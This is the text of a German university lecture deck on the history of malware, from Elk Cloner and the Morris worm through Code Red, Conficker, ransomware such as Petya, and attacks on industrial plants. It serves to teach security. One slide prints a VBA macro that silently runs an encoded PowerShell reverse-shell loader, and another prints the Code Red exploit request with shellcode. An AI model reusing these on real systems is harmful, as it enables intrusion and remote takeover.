Upload
others
View
6
Download
0
Embed Size (px)
Citation preview
SCHERZKEKSE, GAUNER UND SABOTEURE:
DIE SICH WANDELNDE BEDROHUNG IN
EINER DIGITALEN WELTTOBIAS HEER – HOCHSCHULE ALBSTADT-SIGMARINGEN, STUDIENGANG IT SECURITY
Photo credit: Schill on Visualhunt / CC BY
WER BIN ICH?
Tobias Heer
Professor an der Hochschule Albstadt-Sigmaringen
Netzwerke und Netzwerksicherheit
Angewandte Kryptografie
Offensive Sicherheit (Hacking)
Praktikantenamtsleiter IT Security
Senior Architect im CTO Office bei Hirschmann Automation & Control
Gremienarbeit im Bereich Industrie 4.0
Plattform Industrie 4.0 – AG 3 – Sicherheit vernetzter Systeme
ZVEI – Sicherheit Industrie 4.0
VIRUS GEFUNDEN!
3
SCHADSOFTWARE – WIE SCHLIMM IST ES?
4
0
100.000.000
200.000.000
300.000.000
400.000.000
500.000.000
600.000.000
2006 2007 2008 2009 2010 2011 2012 2013 2014 2015 2016
Entwicklung: Anzahl Schadprogramme
Quelle: Die Lage der IT-Sicherheit in Deutschland 2016[3]
Täglich:
ca. 380.000 neue
Schadprogrammvarianten
Häufige Infektionswege:
▪ E-Mail-Anhänge
▪ Drive-by Downloads bei
Besuch von Webseiten
▪ Malvertising
Malware: Häufigste
Angriffsart im Bereich IT
Sicherheit
Laut Cyber-Sicherheits-
umfrage 2015 der Allianz für
Cyber-Sicherheit
5
Scherzkekse und ErkunderVIREN, WÜRMER UND ANDERES GETIER
Photo credit: frank-hl on Visualhunt.com / CC BY-SA
6
CLOWNS: ELK CLONER (1982)
7
Erster Computervirus, der sich auf Personal Computer ausgebreitet hat
Wandert von Festplatte zu Festplatte durch Neuschreiben des Bootsektors
Überwacht die Disketten-Aktivität und kopiert sich auf weitere Disketten
Zeigt Gedicht bei jedem 50. Bootvorgang an
Nur 400 Zeilen Assemblercode
Bleibt im Hauptspeicher, auch wenn eine andere Festplatte eingelegt ist
War als Streich gedacht.
POEMASC 'ELK CLONER:'
DFB $8D,$8D
ASC ' THE PROGRAM WITH A PERSONALITY'
DFB $8D,$8D,$8D
ASC 'IT WILL GET ON ALL YOUR DISKS'
DFB $8D
ASC 'IT WILL INFILTRATE YOUR CHIPS'
DFB $8D
ASC 'YES IT'
DFB $A7
ASC 'S CLONER!'
DFB $8D,$8D
ASC 'IT WILL STICK TO YOU LIKE GLUE'
DFB $8D
ASC 'IT WILL MODIFY RAM TOO'
DFB $8D
ASC 'SEND IN THE CLONER!'
DFB $8D,$8D,$8D,$8D,$0
POEMASC 'ELK CLONER:'
DFB $8D,$8D
ASC ' THE PROGRAM WITH A PERSONALITY'
DFB $8D,$8D,$8D
ASC 'IT WILL GET ON ALL YOUR DISKS'
DFB $8D
ASC 'IT WILL INFILTRATE YOUR CHIPS'
DFB $8D
ASC 'YES IT'
DFB $A7
ASC 'S CLONER!'
DFB $8D,$8D
ASC 'IT WILL STICK TO YOU LIKE GLUE'
DFB $8D
ASC 'IT WILL MODIFY RAM TOO'
DFB $8D
ASC 'SEND IN THE CLONER!'
DFB $8D,$8D,$8D,$8D,$0
Auszug aus Elk Cloner Source Code:
EXPLORERS: MORRIS INTERNET WORM (1988)
8
Computer History Museum Mountain View‘
Quelle: Wikimedia
Robert T. Morris führte 1988 ein "Experiment" durch, um die Größe des Internets zu „messen“
Erster weit verbreiteter Computerwurm in der Geschichte
Infektion von DEC VAX und SUN Computern (4BSD)
Drei verschiedene Infektionspfade
Erraten des Kennworts durch, um auf den Benutzerkonten zuzugreifen
Anmeldung über gespeicherte Benutzerpasswörter an anderen Rechnern (rsh Remote-Anmeldung)
Sicherheitslücke in der sendmail Konfiguration (debug Option)
Pufferüberlauf im Finger-Befehl
Verschiedene Verschleierungskonzepte
Wurm versucht sich zu verstecken, indem er seinen Prozessnamen und seine ID ändert
Wurm ist lange Zeit inaktiv, um eine Entdeckung zu vermeiden
Wurm vermeidet Mehrfachinfektionen, aber jede 7. Instanz wird nicht beendet
DoS durch mehrere Infektionen
VERBREITUNG VON WÜRMERN
9
Fähigkeit, sich ohne menschliches
Eingreifen zu replizieren
Verwendung von Schwachstellen und
falschen Konfigurationen
Manchmal werden mehrere
Sicherheitslücken verwendet
Sehr schnelle Verbreitung mit Phasen
exponentiellen Wachstums, da keine
Interaktion erforderlich ist
t = time
100% 1 2 3
f =
ratio
of in
fecte
d
syste
ms
Typische Wachstumskurve einer
Epidemie
1 Langsames anfängliches
Wachstum
2 exponentielles Wachstum
3 abnehmendes Wachstum
während der Sättigungsphase
AUSWIRKUNGEN DES MORRIS WURMS
10
Auswirkungen des Wurms
Ungefähr 10% des Internets waren infiziert
Schätzungen reichen von 2.000 bis 6.000 infizierten Maschinen
Kein Schaden außer einem unbeabsichtigten DoS-Angriff
Persönliche Konsequenzen für Robert T. Morris
Verweis von der Cornell University
Verurteilt zu 10.000 USD Strafe und 400 Stunden Sozialarbeit
Gewonnene Erkenntnisse
Ernstfall üben! Vorbereitungen treffen!
Bekannte Sicherheitslücken müssen behoben werden
CERT (Computer Emergency Response Team www.cert.org) wurde geschaffen, um
Unternehmen zu unterstützen und Aktionen in Notfallsituationen zu koordinieren
Robert T. Morris
Heute: Professor MIT
(Quelle: Wikimedia)
11
VandalenZERSTÖRUNGSORIENTIERTE CYBERANGRIFFE
Photo on https://visualhunt.com/re/d04967 VisualHunt
VANDALEN: MICHAELANGELO (1992)
12
loc_7: ;check if it is time to nuke
xor cx,cx ; Zero register
mov ah,4
int 1Ah ; Real time clock
; ah=func 04h don't work on an xt
; read date cx=year, dx=mon/day
cmp dx,306h ; See if March 6th
je loc_8 ; Jump if equal to nuking subs
retf ; Return to launch command.com
loc_7: ;check if it is time to nuke
xor cx,cx ; Zero register
mov ah,4
int 1Ah ; Real time clock
; ah=func 04h don't work on an xt
; read date cx=year, dx=mon/day
cmp dx,306h ; See if March 6th
je loc_8 ; Jump if equal to nuking subs
retf ; Return to launch command.com
Bootsektor-Virus der programmiert wurde, um am 6.
März (Geburtstag von Michelangelo) eine „Logic Bomb“
auszulösen
Überschreiben erster HDD-Sektoren mit Nullen
Verbreitung und Infektion
Wurde über infizierte 5,25 "-Disketten verbreitet
Überschreiben des MBR von HDDs
Massenverteilung durch infizierten Treiberdisketten die mit
Computerhardware ausgeliefert wurden (z.B. kostengünstige
Maus)
Ziemlich klein <200 LOC
in Assembler (80x86)
Autor unbekannt,
Variation des Stoned-Virus
VANDALEN: MELISSA (1999)
13
Microsoft Word und Outlook 98/2000 sind 1999 in der gesamten Softwarelandschaft zu finden
Verteilung per E-Mail:
Melissa Code kommt eingebettet in Word-Dokument (VBA Makro)
Anscheinend Liste von Porno Seiten im .doc
Malware sendet Kopien von Melissa an 50 Personen im Kontaktbuch des Opfers
Der Virus vermeidet Mehrfach-Infektionen durch Erstellen eines Registrierungsschlüssels:
HKEY_Current_User \ Software \ Microsoft \Office \ Melissa?
Virus infiziert Normal.dot (Vorlage für Standard-Word-Dokumente)
Neue Word-Dokumente sind standardmäßig infiziert
Geschätzter Schaden in Nordamerika: 80 Millionen USD (wegen E-Mail-Überlastung)
Image : Heise
"Twenty-two points, plus triple-word score, plus fifty points for using all my letters. Game's over. I'm outta here."
MODERNE VBA MACRO MALWARE
14
Meterpreter Reverse Shell
Code eingebettet in VBA,
ausgeführt von Powershell
Die Integration ist schnell
und einfach:
Nutzlast auswählen
Generiere Code durch
Schleiervermeidung
Erstellen Sie
Makroeinbettung mit
Macroshop
Nun fehlt nur noch eine
interessante Office Datei,
um den Code einzubetten
Sub Workbook_Open()
'VBA arch detect suggested by "T"
Dim Command As String
Dim str As String
Dim exec As String
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
Command = "powershell.exe"
End If
str = "nVRtc9pGEP7Or9jRXGekMZLFS6iNxjMhOG7cBuIaYqdlmM4hLeji05"
str = str + "18Otlgwn/vCquYfO0XnXa1t8+zu8+KPcIFvHcas0spr7NcG+"
…
str = str + "KmSLmksQx1vnFZ3oSwCbPXhZ67bE2LREan7XpeEw4gVWl05f"
str = str + "iPQ4hNtm5WR1gtnC6tr0pJqtn/VfyJRMxp7zDWJOuzXjcMdz"
str = str + "T9ON3u/gU="
exec = Command + " -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRea"
exec = exec + "der ($(New-Object IO.Compression.DeflateStream ("
exec = exec + "$(New-Object IO.MemoryStream (,$([Convert]::From"
exec = exec + "Base64String(\"" " & str & " \"" )))), [IO.Compr"
exec = exec + "ession.CompressionMode]::Decompress)), [Text.Enc"
exec = exec + "oding]::ASCII)).ReadToEnd();"""
Shell exec,vbHide
End Sub
Macroshop Macro Code (Auszug)
DIE GROßE HERAUSFORDERUNG: “KLICK DEN
INHALT AKTIVIEREN” BUTTON!
Excel kommt standardmäßig mit deaktivierten Makros.
Herausforderung für den Angreifer: das Opfer muss auf den "Bearbeiten-Button" klicken
Social Engineering:
Aufbauen von Interesse, Druck, etc., um das Opfer zum Bearbeiten des Formulars zu bewegen
Beispiel: gut gemachtes Formular mit erwarteten Inhalten
Sobald das Opfer die Makros aktiviert hat der Angreifer die Kontrolle
15
VERÄNDERUNGEN DER VERBREITUNG
16
Für die Zeit typische
Kommunikationsmuster
beeinflussen die
Verbreitung von Viren:
Anfänglich war der
physische Transport
durch eine Diskette der
vorherrschende Weg für
die Verteilung
Die Verteilung per E-Mail
ersetzte die Diskette, als
sie allgemein verfügbar
wurde
ICSA Labs Annual Computer Virus Prevalence Survey (2004)
VANDALEN: CODE RED A UND B (13. JULI 2001)
17
Wurm, welcher Pufferüberlauf in
Microsoft IIS-Webservern ausnutzt
Schwachstelle kann aus dem Internet
ausgenutzt werden und erfordert keine
Authentifizierung
Pufferüberlauf im IIS-Indizierungsserver
(idq.dll) (Vulnerability ms01-033)
Sicherheitslücke von Microsoft am 18.
Juni (mehr als drei Wochen vor dem
Angriff von Code Red) geschlossen
Wurm verbreitet sich, indem er eine
Liste von "zufälligen" IP-Adressen
scannt, Kontakt aufnimmt und die
Schwachstelle des IIS-Servers ausnutzt
Source: http://wptidbits.com/resources/12-most-devastating-pc-
viruses-and-worms-of-all-time/
Glück im Unglück: Code Red Version A
enthielt einen Fehler: es verwendete
eine statische Initialisierung des
Zufallszahlen-Generators und
attackierte dieselben Hosts immer und
immer wieder
Nur schwache Verbreitung
Photo on
Visualhunt
CODE RED A INFEKTIONEN
18
Das Wurmverhalten verändert sich
über die Zeit (orientiert an Monat)
Tag 1-19: Wurm verbreitet sich
Tag 20-27: DoS Attack
> Tag 27: Wurm tut nichts
Wurm Verbreitung:
250.000 Systeme in nur 9 Stunden
infiziert
Studie von CERT: Wurm hätte 100%
aller anfälligen IIS-Server im Internet
innerhalb von 18 Stunden infizieren
können
Am 19. Juli: explosionsartiger Anstieg
der Infektionen
Infektionen wurden gestoppt, als der
Wurm in die DDoS-Phase eintrat
Verbreitungs-
phase
DDoS Phase
(weniger Infektionen)
CODE RED AUSWIRKUNGEN
19
Code Red A
DDoS der IP-Adresse der Website des Weißen Hauses und anderer fester IP-Adressen
Der DDoS-Angriff war nicht erfolgreich, weil die Websites auf andere IP-Adressen verschoben wurden
Langsame Ausbreitung aufgrund des Zufallsgeneratoren-Fehlers
Ca. 250.000 infizierte Server Code Red
Version B hat diesen Bug behoben, aber führt keinen DoS Angriff mehr durch
Installation von Hintertür
Ca. 360.000 infizierte Server
Gesamtschaden 2,6 Milliarden USD:
Ca. 1,1 Milliarden USD für die Reinigung
Ca. 1,5 Milliarden USD Verluste aufgrund von Ausfallzeit
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNN %u9090%u6858%ucbd3
%u7801%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNN %u9090%u6858%ucbd3
%u7801%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Source: https://www.caida.org/research/security/code-red/coderedv2_analysis.xml
Code Red B Verteilung:
Beispiel eines Angriffs (via HTTP):
BUSINESSMEN AND ROBBERS
20
Geschäftsleute und GaunerANGRIFFE MIT FINANZIELLEN ABSICHTEN
Photo
credit:
Infosec
Images
on
Visualhun
t.com/
CC BY
GESCHÄFTSLEUTE?: CONFICKER (2008-2009)
21
1. April 2009
35 Mio. unterschiedliche IP Adressen gesichtet
Etwa 11 Mio. Geräte übernommen/infiziert
Source: http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionDistribution
C&C Server
Victim
CONFICKER WURM / BOTNETZ
22
Verbreitet sich über die eigentlich bereits behobene MS08-067 Schwachstelle (SMB
Netbios Subsystem)
Ziele:
Windows Vista, Windows XP (bis SP3), Windows 2003 (bis SP2), Windows 2000
Mehrere Versionen (A, B, C, D, E)
Conficker “Features”
Verschlüsselte und authentifizierte Kommunikation mit dem C2 Server
Abschaltung von AV Software, Verhinderung von Updates und Patchen der ursprünglichen
Schwachstelle
Rendezvous Mechanismus mit C2 Server: Domain Generation Algorithm
KONTAKT ZUM C&C SERVER
23
Verwendung des DNS Systems
Clients bauen Verbindungen zu zufällig erscheinenden Domänennamen auf
C&C Server befindet sich unter einem dieser Domänennamen
Source: http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionDistribution
.net
TLD DNS Serverpuxqy.
net
CONFICKER DGA
24
Version A generierte jeden Tag 250 Domains bei fünf verschiedenen TLDs
Version B generierte jeden Tag 250 Domains bei acht verschiedenen TLDs
Version C generierte täglich 50.000 Domains bei 116 TLDs
Blockieren von Conficker durch Übernahme aller C&C-Domainnamen wurde fastunmöglich
116 TLDs kooperierten, um alle von der DGA generierten Domains zu blockieren!
Aber ... Conficker C hat einen P2P-Kontrollmechanismus
DNS-Blockierung wurde unwirksam!
Conficker C wurde über P2P auf Conficker E aktualisiert
"ac" , "ae" , "ag" , "am" , "as" , "at" , "be" , "bo" , "bz" , "ca" , "cd" , "ch" , "cl" , "cn" , "co.cr" , "co.id" , "co.il" , "co.ke" , "co.kr" , "co.nz" , "co.ug" , "co.uk" , "co.vi" , "co.za" , "com.ag" , "com.ai" , "com.ar" , "com.bo" , "com.br" , "com.bs" , "com.co" , "com.do" , "com.fj" , "com.gh" , "com.gl" , "com.gt" , "com.hn" , "com.jm" , "com.ki" , "com.lc" , "com.mt" , "com.mx" , "com.ng" , "com.ni" , "com.pa" , "com.pe" , "com.pr" , "com.pt" , "com.py" , "com.sv" , "com.tr" , "com.tt" , "com.tw" , "com.ua" , "com.uy" , "com.ve" , "cx" , "cz" , "dj" , "dk" , "dm" , "ec" , "es" , "fm" , "fr" , "gd" , "gr" , "gs" , "gy" , "hk" , "hn" , "ht" , "hu" , "ie" , "im" , "in" , "ir" , "is" , "kn" , "kz" , "la" , "lc" , "li" , "lu" , "lv" , "ly" , "md" , "me" , "mn" , "ms" , "mu" , "mw" , "my" , "nf" , "nl" , "no" , "pe" , "pk" , "pl" , "ps" , "ro" , "ru" , "sc" , "sg" , "sh" , "sk" , "su" , "tc" , "tj" , "tl" , "tn" , "to" , "tw" , "us" ,
"vc" , "vn"
"ac" , "ae" , "ag" , "am" , "as" , "at" , "be" , "bo" , "bz" , "ca" , "cd" , "ch" , "cl" , "cn" , "co.cr" , "co.id" , "co.il" , "co.ke" , "co.kr" , "co.nz" , "co.ug" , "co.uk" , "co.vi" , "co.za" , "com.ag" , "com.ai" , "com.ar" , "com.bo" , "com.br" , "com.bs" , "com.co" , "com.do" , "com.fj" , "com.gh" , "com.gl" , "com.gt" , "com.hn" , "com.jm" , "com.ki" , "com.lc" , "com.mt" , "com.mx" , "com.ng" , "com.ni" , "com.pa" , "com.pe" , "com.pr" , "com.pt" , "com.py" , "com.sv" , "com.tr" , "com.tt" , "com.tw" , "com.ua" , "com.uy" , "com.ve" , "cx" , "cz" , "dj" , "dk" , "dm" , "ec" , "es" , "fm" , "fr" , "gd" , "gr" , "gs" , "gy" , "hk" , "hn" , "ht" , "hu" , "ie" , "im" , "in" , "ir" , "is" , "kn" , "kz" , "la" , "lc" , "li" , "lu" , "lv" , "ly" , "md" , "me" , "mn" , "ms" , "mu" , "mw" , "my" , "nf" , "nl" , "no" , "pe" , "pk" , "pl" , "ps" , "ro" , "ru" , "sc" , "sg" , "sh" , "sk" , "su" , "tc" , "tj" , "tl" , "tn" , "to" , "tw" , "us" ,
"vc" , "vn"
Variant, Date, Index, Hostname
A, 02/12/2009, 0, puxqy.net
A, 02/12/2009, 1, elvyodjjtao.net
A, 02/12/2009, 2, ltxbshpv.net
A, 02/12/2009, 3, ykjzaluthux.net
A, 02/12/2009, 4, lpiishmjlb.net
A, 02/12/2009, 5, arpsyp.com
A, 02/12/2009, 6, txkjngucnth.org
A, 02/12/2009, 7, vhslzulwn.org
A, 02/12/2009, 8, jcqavkkhg.net
A, 02/12/2009, 9, dmszsyfp.info
(Source : https://blogs.technet.microsoft.com/msrc/2009/02/12/conficker-domain-information/)
Variant, Date, Index, Hostname
A, 02/12/2009, 0, puxqy.net
A, 02/12/2009, 1, elvyodjjtao.net
A, 02/12/2009, 2, ltxbshpv.net
A, 02/12/2009, 3, ykjzaluthux.net
A, 02/12/2009, 4, lpiishmjlb.net
A, 02/12/2009, 5, arpsyp.com
A, 02/12/2009, 6, txkjngucnth.org
A, 02/12/2009, 7, vhslzulwn.org
A, 02/12/2009, 8, jcqavkkhg.net
A, 02/12/2009, 9, dmszsyfp.info
(Source : https://blogs.technet.microsoft.com/msrc/2009/02/12/conficker-domain-information/)
Conficker C&C domains generated by the DGA
Conficker C TLDs:
AUSWIRKUNGEN VON CONFICKER
25
Hoher Schaden durch Bereinigung
Möglicherweise bis zu 9 Milliarden USD Gesamtschaden (laut Cyberseceinstitute)
Bundeswehr-PCs waren im Februar 2009 infiziert
Französische Marine wurde im Januar 2009 infiziert
Es gibt nur Spekulationen über den Zweck des Botnetzes...
Conficker wurde verwendet, um die Software des Waledac-Botnetzes auf von Conficker infizierten Rechnern herunterzuladen und zu installieren, aber es passierte nicht viel mehr
Anwendungen, die Confickers Leistung voll ausnutzen würden, wurden nie gefunden
Theorie 1: Das Conficker-Botnetz wurde zu "heiß", um benutzt zu werden.
Theorie 2: Conficker hat etwas gemacht, aber niemand hat es jemals bemerkt
Conficker existiert noch: Im Jahr 2016 wurde Conficker auf einem PC im AKW Grundremmingen entdeckt. Der PC visualisiert die Lademechanik der Kernbrennstäbe
WIE VERDIENT MAN MIT EINEM BOTNETZ GELD?
26
DDoS as a Service
Ab 20 USD für 30 MinutenDenial of Service Angriffe
Diebstahl von Benutzerdaten
< 10$ für Streaming Account (HBO Streaming)
8$ für iTunes Account
2.5$ für einen Facebook Account
Diebstahl von Bankinformationen
5$ - 45$ für Kreditkartendaten je nach Land und Zusatzinformationen
Bitcoin Mining 9 Tage!
More on cybercrime economy: https://www.mcafee.com/us/resources/reports/rp-hidden-data-economy.pdf
AKTUELLE C2 SERVER ADRESSEN
27
Knapp 900 aktuell aktive C2 Server auf abuse.ch bekannt
…
…
https://ransomwaretracker.abuse.ch/tracker/
GESCHÄFTSLEUTE: ENTWICKLUNG DER RANSOMWARE
28
Bereits 1989 werden die ersten Angriffe mit Ransomware durchgeführt
Der AIDS Trojaner ist in QuickBasic geschrieben
Verbreitungsweg und Verbreitung
Er wurde per 5,25“ Diskette ca. 20.000mal mit der Post verschickt
Die Disketten hatten die Aufschrift „AIDS Information – IntroductoryDiskettes“ und enthielt eine Lizenz-vereinbarung für die Nutzung
Wirkweise
Nach öffnen von INSTALL.EXE installierte sich das Programm in den Start-Dateien (AUTOEXEC.BAT) und wurde inaktiv
Nach 90 Starts wurden die Namen der Dateien auf Laufwerk C: symmetrisch verschlüsselt und die Verzeichnisse vor dem Benutzer versteckt
Anzeige einer Meldung die zur Erneuerung der Lizenzzahlung für die AIDS Datenbank aufrief bevor der Computer wieder verwendbar gemacht würde. Kosten: 189 USD
Auswirkungen;
Eine italienische AIDS Organisation verlor Forschungsergebnisse aus 10 Jahren
Ersteller der Ransomware wurde 1990 verhaftet
Bild
quelle
:
htt
ps:
//uplo
ad.w
ikim
edia
.org
/wik
ipedia
/
com
mons/
e/e
c/A
IDS_
DO
S_T
roja
n.p
ng
AIDS LICENSE AGREEMENT
29
AIDS trojan license agreement:
If you install [this] on a microcomputer...then
under terms of this license you agree to pay PC
Cyborg Corporation in full for the cost of leasing
these programs...In the case of your breach of this
license agreement, PC Cyborg reserves the right to
take legal action necessary to recover any
outstanding debts payable to PC Cyborg Corporation
and to use program mechanisms to ensure termination
of your use...These program mechanisms will
adversely affect other program applications...You
are hereby advised of the most serious consequences
of your failure to abide by the terms of this
license agreement; your conscience may haunt you for
the rest of your life...and your [PC] will stop
functioning normally...You are strictly prohibited
from sharing [this product] with others...
Source:
https://www.virusbulletin.com/uploads/pdf/magazine/199
0/199001.pdf
RANSOMWARE GEGEN SCHULEN UND
ÖFFENTLICHE EINRICHTUNGEN
Bewerbung in fehlerfreiem Deutsch
Excel Datei mit “Informationen” –Kompetenzprofil
Verschlüsselung von Dateien auf der Festplatte
Neustart und Verschlüsselung mit gefälschten Chkdsk Meldung vor Boot
Verschlüsselung von Daten auf lokalen Laufwerken und Netzwerk-Laufwerken
Ziel sind modernere Windows Rechner >= Windows 7
Golden Eye wird in E-Mails als Bewerbung mit konkretem Bezug auf Stellenanzeigen der Zielfirmen verschickt
Anschreiben und Lebenslauf sind so gut gemacht, dass oftmals die Excel Datei geöffnet wird
https://www.heise.de/security/meldung/Aufgepasst-Neuer-Verschluesselungstrojaner-Goldeneye-verbreitet-sich-rasant-3561396.html
30Bildquelle: Heise
RANSOMWARE PETYA
31
Momentan sehr populäre Ransomware:
Verschiedene Verbreitungswege
Watering hole Attacke: MEDoc Steuer-Software in der Ukraine
Wurm: Eternal Blue (MS17-010 - SMB Exploit)
SPAM
Petya überschreibt den Master Boot Record und bringt den Computer zum Absturz
Code im MBR erzeugt gefälschte checkdsk Anzeige und verschlüsselt
Orte der Daten auf dem Datenträger sind verloren
Petja verschlüsselt auch das erste Kilobyte der Dateien
Salsa20 Algorithmus
Petya Ransom Note:
Gefälschte CHKDSK Nachricht
DOPPELT HÄLT BESSER: PETYA AND MISCHA
32
Petya:
Verschlüsselung der
ganzen Festplatte
wenn der Benutzer
ein Administrator ist
Mischa: Ansonsten
Verschlüsselung der
Benutzerdateien
User executes
malware
UAC PromptNothing
happens
Yes
No
Ransom Note
Encrypt Local
Files
Mis
cha
Source: https://www.digitalxraid.com/goldeneye-ransomware/
Overwrite
MBR
CHKDSK
Encrypt MFT
Ransom Note
PetyaRansom Note im Browser:
Ransom Note
beim Boot:
R
WARUM FUNKTIONIERT RANSOMWARE SO GUT?
Hoher subjektiver Leidensdruck beim Opfer
Hohe Wiederherstellungsaufwände bei Firmen
(Wiederherstellung ist arbeitszeitintensiv)
Oftmals fehlende Backups bei Privatpersonen (keine
Alternative zur Zahlung vorhanden)
Gut automatisierbar
Verschlüsselung benötigt keine manuelle Arbeit
durch den Angreifer
Zahlungen über Bitcoin können anonym
abgewickelt werden
Angreifer gehen nach der initialen Infektion ein
geringes Risiko ein
33Photo credit: wuestenigel on Visual hunt / CC BY
RANSOMWARE – ERPRESSUNG MIT SYSTEM
34
AngreiferOpfer
EntwicklerR
$$
R
R
$$$
Verschlüssle
Ransom Note
Starte Malware
R
R
R
VERBREITUNG VON RANSOMWARE HEUTE
35
Angriffsziele:
▪ Desktop Systeme
(Windows, Apple MacOS X)
▪ Server-Systeme GNU/Linux
▪ Mobile Betriebssysteme
Android
BSI-Auswertung
aktive Ransomware-
Familien Q1/Q2 2016:
▪ Locky
▪ TeslaCrypt
▪ Nemucod
▪ Cerber
Quelle: Die Lage der IT-Sicherheit in Deutschland 2017
Firmenumfrage:
▪ 70% der Firmen in den
letzten 6 Monaten betroffen
▪ 22% mit erheblichen
Ausfällen
Kampagnen - (z.B. SPAM, Malvertising)
VERBREITUNGSWEG: MALVERTISING MIT RIG
36
Proxy
Virtual
Dedicated
Server (VDS)
Admin
Server
…
Malvertising/Kompromittierte
Seite bzw. Seite mit
Werbung
Landing
Page
(JS Code)
Browser
Exploits
Statistiken
RIG Team Reseller
RIG Kunde
(Angreifer)
Opfer
Ad
$$$
$$
Payload /
Schadcode
Deliver PL
More
info
: htt
ps:
//w
ww
.tru
stw
ave.c
om
/Reso
urc
es/
Spid
erL
abs-
Blo
g/R
IG-E
xplo
it-K
it-–
-Div
ing-
Deeper-
into
-the-I
nfr
astr
uct
ure
/
Oftmals
infizierter
Server
VERBREITUNGSWEG MALVERTISING/DRIVE-BY-EXPLOITS
37
Angriffsauswertung BSI Q2/2016
Programme:
Angler, Neutrino, Magnitude
Vorgehensweise:
E-Mail Welle mit als Rechnung
getarnten Schadprogrammen
Hauptursache für Drive-by-
Angriffe:
Schädliche Werbebanner
Bereitstellung von Werbebanner
durch Agenturen und Dritte
Keine Überprüfung oder
Qualitätskontrolle vor Einbindung
Möglichkeit der Verwendung:
Webseiten als Ausgangspunkt für
Angriffe mit Drive-by-Exploits
0 50 100 150 200 250 300 350
Microsoft Office
Microsoft Internet Explorer
Microsoft Windows
Oracle,Java/JRE
Mozilla Firefox
Linux Kernel
Google Chrome
Apple OS X
Adobe Flash
Adobe Reader
Behobene kritische Schwachstellen 2016/17
Q2/15 - Q1/16 Q2/16 - Q1/17
Quelle: Die Lage der IT-Sicherheit in Deutschland 2017[7]
EXPLOITS OF DIFFERENT EXPLOIT KITS
38
In Exploit Kits und deren verwendete Browser-Schwachstellen (2014)
Browser mit weniger Schwachstellen machen Exploit Kits weniger effektiv
Abnahme der Angriffe im Jahr 2017
Quelle: http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/exploit-kit-usage.png
IT SICHERHEIT UND INDUSTRIE: EIN NEUES THEMA?
40
Cyberangriffe auf Industrieanlagen gibt es bereits seit Jahrzehnten
Besonders bekannt: Stuxnet
Angriff auf Urananreicherung im Werk Natanz (Iran)
Erste Stuxnet Version: November 2005
Entdeckung von Stuxnet: ca. 2009
Ende des Angriffs: Juni 2012
Angreifer bei Stuxnet: Advanced Persistent Threat -Geheimdienste
Große Herausforderung: Schadcode auf Industriegeräte bekommen Air Gap.
Muss ich als Firma im schönen Schwabenländle Angst vor einem solchen Angreifer haben?
Vermutlich eher nicht Ist nun alles gut?
Quelle: http://blog.nuclearsecrecy.com/tag/centrifuges/
Quelle: Byres Security
Kom
pliz
iert
er
Weg
CYBERSICHERHEIT UND KEKSPRODUKTION –
WAS KANN DA SCHON SCHIEF GEHEN?
41Photo credit: John.E.Robertson on https://visualhunt.com/re/296b7d Visualhunt CC BY
ANGRIFF AUF EINE KANADISCHE KEKSFABRIK –
AUGUST 2015 (INDUSTRIE 3.0)
Annahme der Ingenieure: “Was soll schon passieren? Im schlimmsten Fall sind die Kekse ungenießbar. Da fällt uns eine Tagesproduktion aus.”
Angreifer dringen ins Netzwerk einund beginnen damit dasNetzwerk zu Analysieren
Steuerungen wurden gestört
Keine Kontrolle über die Anlage
Keksteig trocknete in denRohren ein – die Rohre musstenherausgeschnitten werden
42Photo on https://visualhunt.com/re/20b05c Visual Hunt
ANGRIFFE AUF DIE INDUSTRIE
43
Black
Energy 3
Pow
er U
krain
e
(Dez 2
015)
Black
Energy 3
Pow
er U
krain
e
(Dez 2
015)
HA
VEX
RA
T
(Spio
nage
, OPC
)
(Dez 2
014)
HA
VEX
RA
T
(Spio
nage
, OPC
)
(Dez 2
014)
Nig
ht
Dra
gon
(Spio
nag
e, O
il& G
as)
(2009)
Nig
ht
Dra
gon
(Spio
nag
e, O
il& G
as)
(2009)
Stu
xnet
(Iran, S
iem
ens P
LC
s)
(2010)
Stu
xnet
(Iran, S
iem
ens P
LC
s)
(2010)
Opera
tio
n A
uro
ra
(Spio
nag
e &
Man
ip.,
Tech
) (2
009)
Opera
tio
n A
uro
ra
(Spio
nag
e &
Man
ip.,
Tech
) (2
009)
Sham
oo
n (
Sau
di
Ara
bia
n O
li )
(Wip
er)
(2012)
Sham
oo
n (
Sau
di
Ara
bia
n O
li )
(Wip
er)
(2012)
Wan
nac
ry
(Ran
som
war
e)
(Mai
, 2017)
Wan
nac
ry
(Ran
som
war
e)
(Mai
, 2017)
Black
Energy 2
(Spio
nage
)
(Dez 2
010)
Black
Energy 2
(Spio
nage
)
(Dez 2
010)
Wan
nacry
(DB
, Renau
lt, Nissan
)
Wan
nacry
(DB
, Renau
lt, Nissan
)
Angr
iffe
auf In
dust
riean
lage
nA
ngr
iffe
auf In
dust
riebetr
iebe
OT
